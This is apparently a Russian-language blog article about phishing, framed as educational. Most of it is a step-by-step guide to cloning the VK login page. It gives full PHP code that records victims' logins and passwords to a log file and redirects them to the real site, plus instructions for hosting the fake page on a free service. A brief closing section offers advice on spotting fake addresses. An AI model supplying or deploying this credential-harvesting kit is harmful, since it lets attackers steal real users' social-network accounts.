Все, что вы прочитаете в этой статье – опубликовано лишь для ознакомления, в образовательных целях. Автор НЕ НЕСЕТ никакой ответственности за ваши действия.
Всех приветствую. Сегодня хочу затронуть такую очень актуальную тему на сегодняшний день как кража данных в интернете. Ни для кого не секрет, что очень часто у людей взламывают аккаунты в социальных сетях, да и не только. Как же все таки это происходит? Как этого не допустить?Хоть это и не относится к теме статьи, но все же начну с того, что стоит ставить надежные пароли на свои аккаунты, а так же не допускать, чтобы они где-то повторялись.
!!!!!!!!!!!
QWERTY, 12345678, а также ваше имя или дата рождение, и все подобные пароли – это ОЧЕНЬ НЕНАДЕЖНО. Казалось бы, банально и просто, каждый об этом знает, однако до сих пор очень много людей ставят подобные пароли, удивляясь, что их взламывают снова и снова.
Теперь, к теме.Современные системы безопасности достаточно продвинуты, их сложно обойти, сложно взломать, каждый день они становятся все лучше и лучше. Кажется, было бы закономерно, если бы количество мошенничества в интернете становилось все меньше. Однако мы наблюдаем обратное. Почему? Все очень просто. Люди, все больше надеясь, что от всего на свете их спасут эти волшебные системы, перестают следовать самым простым правилам, прежде всего безопасности в интернете, тем самым становясь слабым звеном в этой цепочке. Логично, что мошеннику легче всего воздействовать на самого человека, чтобы добыть необходимую информацию. Поэтому в последнее время самым распространенным видом мошенничества в интернете стал фишинг.
Фишинг (от англ to fish – дословно рыбачить, fishing – выуживание, в данном случае информации) – вид мошенничества, который заключается в том, что человек сам предоставляет нужную информацию (чаще всего – логин/пароль) мошеннику. Чаще всего мошенник делает копию оригинального сайта, под каким то предлогом дает его пользователю, и все, что остается сделать – это убедить пользователя, что он должен ввести свой логин и пароль именно на этой странице. Легче всего это сделать, если написать от имени администрации (например, Вконтакте), или скинуть ссылку на какое то приложение, игру, и т.д.
Пример простейшего фишинг сайта (На примере vk.com)
1. Заходим на сайт vk.com/login, и сохраняем страницу себе на компьютер (ctrl+S). Сохраняем с именем index.html. Должна получиться вот такая папка.
2. В папке index_files смело удаляем все, кроме выделенных файлов.
3. Теперь нам надо написать скрипт, который будет записывать данные из форм «Логин» и «Пароль» в файл (log.txt). Легче всего это сделать на php, поэтому создаем файл, я назову его handler.php. Получилось что-то такое:
<?php
$l="Login: ";
$p="Password: ";
$time=date('Y:m:d--H:i'."\r\n");
$file=fopen('log.txt','a+');
$email=$_POST['email'];
$pass=$_POST['pass'];
fputs($file,"$time$l\n$email\n$p\n$pass\n");
fclose($file);
header('Location:https://vk.com/feed');
?>
(Для тех, кто пишет на php - прошу прощения, если код не очень красивый, php – не мой конек))
Итак, когда пользователь вызовет этот скрипт нажатием на кнопку «Войти», данные из форм запишутся в файл log.txt, если его нет, он будет автоматически создан. После того, как данные занесены в файл, пользователь перенаправляется на свою настоящую страницу ВК (ленту новостей).
4. Теперь нам надо сделать так, чтобы этот скрипт вызывался после нажатия кнопки «Войти». Для этого отредактируем index.html. (Можете использовать любой текстовый редактор, хоть блокнот, я пользуюсь Notepad++) Найдите этот код:
Удалим ненужное, и вместо action=“https://login.vk.com/?act=login”, вставляем action="handler.php". Должно получится вот так:
Если при нажатии на кнопку «Войти» в браузере у вас открывается скрипт нашего handler.php, значит, все сделано правильно.
5. Все, что осталось сделать – залить наш фишинг-сайт на хостинг. Я буду использовать zzz.com.ua. Регистрируемся, выбираем бесплатный домен, затем заходим во вкладку FTP, и загружаем все наши файлы туда. Получилось вот так:
6. Вот и все! Переходим на наш сайт, видим страницу входа Вконтакте.
Попробуем что ни будь ввести, и нас перекидывает на ленту ВК. Зато теперь зайдем в директорию сайта, и увидим, что у нас появился log.txt.
Открываем, и видим, то, что мы ввели.
Вы можете повторить все, что показано в этой статье, но только для того, чтобы понимать как это работает, так как, если вы понимаете эту схему изнутри, вероятность того, что вы попадетесь на очередную уловку мошенника, минимальна.
Как же себя обезопасить?
Не переходите по незнакомым ссылкам, и тем более не вводите там свои логины или пароли. Если же вы переходите по ссылке, всегда смотрите в адресную строку, что там написано. Если вы, например,ожидаете, что должны попасть на сайт Вконтакте, то в адресной строке должно быть написано только https://vk.com/... , а не http://vk.com, или https://wk.com. Спасибо за то, что прочитали эту статью. Пишите комментарии, может я где-то что то упустил, или ошибся, предлагайте темы для статей, постараюсь написать.